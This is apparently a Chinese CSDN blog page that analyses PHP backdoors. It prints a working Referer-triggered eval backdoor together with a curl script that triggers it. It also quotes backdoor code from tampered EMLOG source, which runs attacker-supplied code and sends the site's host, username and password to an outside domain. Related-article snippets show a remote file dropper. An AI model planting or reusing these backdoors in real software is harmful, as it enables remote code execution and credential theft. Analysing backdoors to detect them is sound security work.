php域名追踪后门_一些常见的PHP后门原理分析

最新推荐文章于 2023-01-22 13:57:06 发布
最新推荐文章于 2023-01-22 13:57:06 发布
阅读量153 收藏
点赞数
文章标签: php域名追踪后门
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33274728/article/details/115090768
版权

本地测试结果如下图。

本程序只作为学习作用,请勿拿去做坏事。

复制代码代码如下:

//1.php

header('Content-type:text/html;charset=utf-8');

parse_str($_SERVER['HTTP_REFERER'], $a);

if(reset($a) == '10' && count($a) == 9) {

eval(base64_decode(str_replace(" ", "+", implode(array_slice($a, 6)))));

}<?php

//2.php

header('Content-type:text/html;charset=utf-8');

//要执行的代码

$code = <<

phpinfo();

CODE;

//进行base64编码

$code = base64_encode($code);

//构造referer字符串

$referer = "a=10&b=ab&c=34&d=re&e=32&f=km&g={$code}&h=&i=";

//后门url

$url = 'http://localhost/test1/1.php';

$ch = curl_init();

$options = array(

CURLOPT_URL => $url,

CURLOPT_HEADER => FALSE,

CURLOPT_RETURNTRANSFER => TRUE,

CURLOPT_REFERER => $referer

);

curl_setopt_array($ch, $options);

echo curl_exec($ch);

53072d892a5cf9c7f035d26cf03e0de5.png

最近EMLOG源代码被污染,有些用户下载的出现了以下的后门代码

复制代码代码如下:

if (isset($_GET["rsdsrv"])) {

if($_GET["rsdsrv"] == "20c6868249a44b0ab92146eac6211aeefcf68eec"){

@preg_replace("//e",$_POST['IN_EMLOG'],"Unauthorization");

}

}

file_get_contents("http://某域名/?url=".base64_encode($_SERVER['HTTP_HOST'].$_SERVER['PHP_SELF'])."&username=".base64_encode($username)."&password=".base64_encode($password));

苏利斌
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
一些 PHP 管理系统程序中的后门
10-29
一些php网站管理程序的,一些后门,其实官方也没有恶意,主要是大家为了自己的安全。
PHP后门新玩法:一款猥琐的PHP后门分析
01-30
近日,360网站卫士安全团队近期捕获一个基于PHP实现的webshell样本,其巧妙的代码动态生成方式,猥琐的自身页面伪装手法,让我们在分析这个样本的过程中感受到相当多的乐趣。接下来就让我们一同共赏这个奇葩的...
php域名追踪后门_常用php后门网马总结分析
weixin_34611130的博客
03-08 311
php后门木马对大家来说一点都不陌生吧,但是它的种类您又知多少呢?php后门木马常用的函数大致上可分为四种类型:1. 执行系统命令: system, passthru, shell_exec, exec, popen, proc_open2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, ...
php域名追踪后门_一些 PHP 管理系统程序中的后门
weixin_33989001的博客
03-08 124
我倒不怎么关心提示框,SABLOG怎么知道我的版本有漏洞呢,程序肯定有后门.每次登陆后台自动检测官方版本跟当前版本对比.嗯.后来找到了.在templates/admin/main.php最后的一部分.删掉如下代码就OK了.其实这个不足以导致被黑的,现在一般有点常识的,密码都比较复杂,几个数字+几个字母,MD5的话一般很难跑出来.当然有彩虹表的话,另说...i=1;var autourl=new A...
java后台获取url中的域名
weixin_42286461的博客
10-21 2394
/** * @description 获取域名,如果是ip访问,如127.0.0.1 返回.0.0.1 *如果是域名www.xxxx.com 返回.xxxx.com * @param * @return String */ public static fi...
php程序怎么植入后门,网站被植入后门代码
weixin_29860267的博客
03-27 461
代码如下 有哪位大神告诉下这代码大概的含义 这玩意每天把我index.php加入一段彩票代码$sr = "st" . /*+/*+*/"rr" /*+/*+*/ . "ev";$id = $sr/*+/*+*/("ri" . "d_" . "si");$rn = $sr/*+/*+*/("em" . "an" . "er");$dn = $sr/*+/*+*/("em" . "anr" . "id...
Vue.js安装
实践求真知
10-27 381
一独立安装 我们可以在 Vue.js 的官网上直接下载 vue.min.js 并用 <script> 标签引入。 Vue.js下载位置:https://vuejs.org/js/vue.min.js 二使用CDN方法 1 CDN介绍 CDN的全称是Content Delivery Network,即内容分发网络。CDN是构建在现有网络基础之上的智能虚拟网络,依靠部署在各地...
实战分析PHP大马隐藏后门(案例一)的-PHP大马
07-07
实战分析PHP大马隐藏后门(案例一)的-PHP大马
实战分析PHP大马隐藏后门——(案例二)的PHP大马
07-07
实战分析PHP大马隐藏后门——(案例二)的PHP大马
php后门木马常用命令分析与防范
主题模板站的博客
01-22 761
3. 文件包含与生成: require, require_once, include, include_once, file_get_contents, file_put_contents, fputs, fwrite。2. 代码执行与加密: eval, assert, call_user_func,base64_decode, gzinflate, gzuncompress, gzdecode, str_rot13。//可将php代码存于非php后缀文件,例: x.jpg。
渗透学习之PHP--后门
qq_62886656的博客
10-03 1838
渗透学习之php
php植入后门,网站被植入后门代码
weixin_36139228的博客
03-18 437
郎朗坤error_reporting(0);if($_GET['act'] == 'dl'){echo ('FN:URL:');if($_SERVER['REQUEST_METHOD'] == 'POST'){file_put_contents($_POST['fn'], file_get_contents($_POST['url']));}exit;}if($_GET['act'] == 'ul...
一猥琐的PHP后门分析
橙虚缘空间
04-18 1124
Webshell代码如下:&lt;?php error_reporting(0); session_start(); header("Content-type:text/html;charset=utf-8");if(empty($_SESSION['api'])) $_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*...
随记(五):一个简单又较隐蔽的PHP后门
XXR_Beta的博客
12-05 543
话不多说,直接上代码(backdoor.php) <?php function adminer($url, $isi) { $fp = fopen($isi, "w"); $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_BINARYTRANSFER, true); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_seto
那些强悍的PHP一句话后门
大方子
08-06 9315
以一个学习的心态来对待PHP后门程序,很多PHP后门代码让我们看到程序员们是多么的用心良苦。 强悍的PHP一句话后门 这类后门让网站、服务器管理员很是头疼,经常要换着方法进行各种检测,而很多新出现的编写技术,用普通的检测方法是没法发现并处理的。今天我们细数一些有意思的PHP一句话木马。 利用404页面隐藏PHP小马   PHP   1 2 3 4 ...
php上传后门,PHP图片后门藏匿攻略
weixin_42298973的博客
03-10 715
我们平时藏匿图片后门是什么流程呢?我们来看一下0x01 初级的藏匿方法:1、建立一个eval.php文件,上面加入我们的后门:Default12、找一张图片1.jpg,最好是从目标网站上下载下来的图片。3、合并图片和php后门:DefaultCopy /b C:\xampp\htdocs\images\1.jpg + C:\xampp\htdocs\images\eval.php C:\xampp...
搜索引擎来路判断且进行跳转解决方法
weixin_34185512的博客
04-01 627
$RUrl=$_SERVER['HTTP_REFERER'];if(!empty($RUrl)){$UArray=parse_url($RUrl);$UHost=$UArray['host'];switch($UHost){case'www.baidu.com':...
PHP大马后门分析
qq_17754023的博客
02-28 3892
PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门分析大马文件 打开下载的php大马,可以看出该大马是经过加密了的。 加密不用说,一看就是有后门 从源码开头可以看见 eval(gzinflate(base64_decode(" base64+gzin..
php源码扫描后门工具
最新发布
01-23
这种工具的工作原理通常是通过识别常见后门代码特征,如eval、assert、system等函数的调用,或者是通过检测非常规的文件操作、远程代码执行等可疑行为。一旦发现可能存在后门的代码片段,工具会向开发者报告,以便...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值